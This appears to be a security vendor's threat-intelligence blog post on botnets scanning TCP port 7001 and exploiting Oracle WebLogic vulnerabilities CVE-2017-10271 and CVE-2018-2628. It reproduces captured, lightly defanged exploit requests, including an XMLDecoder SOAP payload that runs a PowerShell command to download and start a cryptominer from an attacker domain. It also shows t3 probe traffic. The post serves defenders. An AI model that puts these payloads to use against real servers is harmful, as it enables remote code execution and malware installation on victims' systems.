1-800-335-0403 Blog Careers Contact Us
Post

Weaponizing Oracle WebLogic Vulnerabilities

 

One of the many ongoing challenges faced by security operations center (SOC) analysts is making sense of (and unfortunately in many cases just ignoring) the thousands of scanning events that troll their public internet-facing servers each day.

Famously, beginning with the Morris Worm and carrying forward to today’s Mirai and Reaper campaigns, threat actors have embraced botnets’ abilities to scan large blocks of attack surface and then opportunistically exploit machines where vulnerabilities exist. Last year’s WannaCry and Zealot campaigns are strong examples of how actors monetized this process via ransomware and miner payloads respectively.

 

Bots Scanning on TCP port 7001
Recent Oracle WebLogic vulnerabilities CVE-2017-10271 and CVE-2018-2628 are just another chapter in this story, as bots have already been observed attempting weaponize these vulns. Data from Grey Noise Intelligence (GNI) is extremely useful here to identify and establish the scale of this activity, which appears to be primarily targeting TCP port 7001 (i.e., Oracle WebLogic servers).

Here are GNI’s complete lists of all source IP addresses scanning and connecting on TCP port 7001.  And with the ready availability of tools such as Shodan and Censys, it stands to reason that more targeted exploitation attempts are likely to occur (if not already happening) in the wild.

JASK ASOC currently tags this activity as “IP Address Scan – External” signals and also provides the ability to more broadly investigate these events via the Zeppelin notebook interface. The query below reveals all destination IP addresses that have been scanned for TCP port 7001. (Cross-correlating these scanning results with successful connections in the ‘flows’ table is recommended to quantify possible exposure).

 

Exploitation Attempts of Exposed Servers on TCP port 7001

Once a vulnerable machine is identified, actors move on to exploitation. The code block below shows an attempt to exploit an Oracle WebLogic server via CVE-2017-10271.

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Cache-Control: no-cache
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Host: 46.101.48[.]196:7001
Content-Type: text/xml
Content-length: 2048
 
<soapenv:Envelope xmlns:soapenv=”hXXp://schemas.xmlsoap[.]org/soap/envelope/”>
    <soapenv:Header>
        <work:WorkContext xmlns:work=”hXXp://bea[.]com/2004/06/soap/workarea/”>
            <java version=”1.8″ class=”java.beans.XMLDecoder”>
                <void id=”url” class=”java.net.URL”>
                    <string>
                       http://51.254.219[.]134/oracleaudit.php?port=7001
                    </string>
                </void>
                    <void idref=”url”>
                        <void id=”stream” method = “openStream” />
                    </void>
                </java>
            </work:WorkContext>
        </soapenv:Header>
    <soapenv:Body/>
</soapenv:Envelope>
 
— AND —
 
<soapenv:Envelope xmlns:soapenv=”hXXp://schemas.xmlsoap[.]org/soap/envelope/”>
     <soapenv:Header>
     <work:WorkContext xmlns:work=”hXXp://bea[.]com/2004/06/soap/workarea/”>
     <java version=”1.8.0_131″ class=”java.beans.XMLDecoder”>
     <void class=”java.lang.ProcessBuilder”>
     <array class=”java.lang.String” length=”3″>
     <void index=”0″>
     <string>cmd</string>
     </void>
     <void index=”1″>
     <string>/c</string>
     </void>
     <void index=”2″>
     <string>powershell (new-object System.Net.WebClient).DownloadFile(‘hXXp://down.kingminer[.]club/downloader.exe’,’C:/Windows/temp/searsvc.exe’);start C:/Windows/temp/searsvc.exe</string>
     </void>
     </array>
     <void method=”start”/></void>
     </java>
     </work:WorkContext>
     </soapenv:Header>
     <soapenv:Body/>
</soapenv:Envelope>POST /wls-wsat/CoordinatorPortType HTTP/1.1

In the case of this exploit attempt, a miner payload ‘downloader.exe’ was downloaded from the GoDaddy registered down[.]kingminer[.]club hosted on 173.208.202[.]234. (Note: While we were unable to locate a sample available on public sandboxes, a potentially related downloader.exe sample from the same delivery domain submitted to reverse.it on April 21, 2018.)

GET /downloader.exe HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: down.kingminer[.]club
Connection: Keep-Alive
 
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 671744
Accept-Ranges: bytes
Server: HFS 2.3j
Set-Cookie: HFS_SID_=0.084782496560365; path=/; HttpOnly
ETag: F7723B04C3746136B7139F65E603ACBC
Last-Modified: Tue, 29 Aug 2017 10:13:50 GMT
Content-Disposition: attachment; filename=”Downloader.exe”;
MZ…………………[email protected]………………………………………         .!..L.!This program cannot be run in DOS mode.
 
$………;…U_..U_..U_..Y_..U_m.[_..U_..__U.U_..^_..U_..F_..U_..F_..U_..T_..U_..^_..U_..__..U_..U_..U_).S_..U_Rich..U_……………………PE..L……Z……………………………………@……………………[email protected]……P.
………………………………………..
.!F……………………………………………………………………………………………..text…:……………………… ..`.rdata…&…….0………………@[email protected]………… ………………@….rsrc…!F….

Many of these same source IPs scanning and exploiting port 7001 have also incorporated the more recent Oracle WebLogic CVE-2018-2628 vulnerability. JASK’s Rod Soto demonstrates this remote code execution (RCE) in several proof of concept screenshots below, and exploit.py code is available on github courtesy of brianwrf.

Related activity to this newer vulnerability has also been seen in the wild, the below probes were recently captured by Grey Noise Intelligence (GNI).

{
 “timestamp”: “2018-04-20 13:36:47”,
  “protocol”: “tcp”,
 “source_ip”: “94.183.167.111”,
 “source_port”: 39048,
  “destination_port”: 7001,
  “size”: 37,
  “timeout”: true,
  “data”: “dDMgMTIuMi4xCkFTOjI1NQpITDoxOQpNUzoxMDAwMDAwMAoKAA==”
}
{
 “timestamp”: “2018-04-20 22:35:19”,
  “protocol”: “tcp”,
 “source_ip”: “107.144.121.131”,
 “source_port”: 16677,
 “destination_port”: 7001,
  “size”: 36,
  “timeout”: true,
  “data”: “dDMgMTIuMi4xCkFTOjI1NQpITDoxOQpNUzoxMDAwMDAwMAoK”
}
{
 “timestamp”: “2018-04-22 19:08:56”,
  “protocol”: “tcp”,
 “source_ip”: “219.91.233.184”,
 “source_port”: 32368,
 “destination_port”: 7001,
  “size”: 36,
  “timeout”: true,
  “data”: “dDMgMTIuMi4xCkFTOjI1NQpITDoxOQpNUzoxMDAwMDAwMAoK”
} 
Decoded “data”:
t3 12.2.1
AS:255
HL:19
MS:10000000

JASK expects to see significant exploitation of this vulnerability (similar to the widespread Muhstik exploitation of Drupal vulnerability CVE-2018-7600) in the near future.

Special thanks to Rod Soto (JASK) and Andrew Morris (GNI) for contributing to this research.

 

About JASK.AI

JASK is modernizing security operations to reduce organizational risk and improve human efficiency. Through technology consolidation, enhanced AI and machine learning, the JASK Autonomous Security Operations Center (ASOC) platform automates the correlation and analysis of threat alerts, helping SOC analysts focus on high-priority threats, streamline investigations and deliver faster response times.

Share on
CLOSE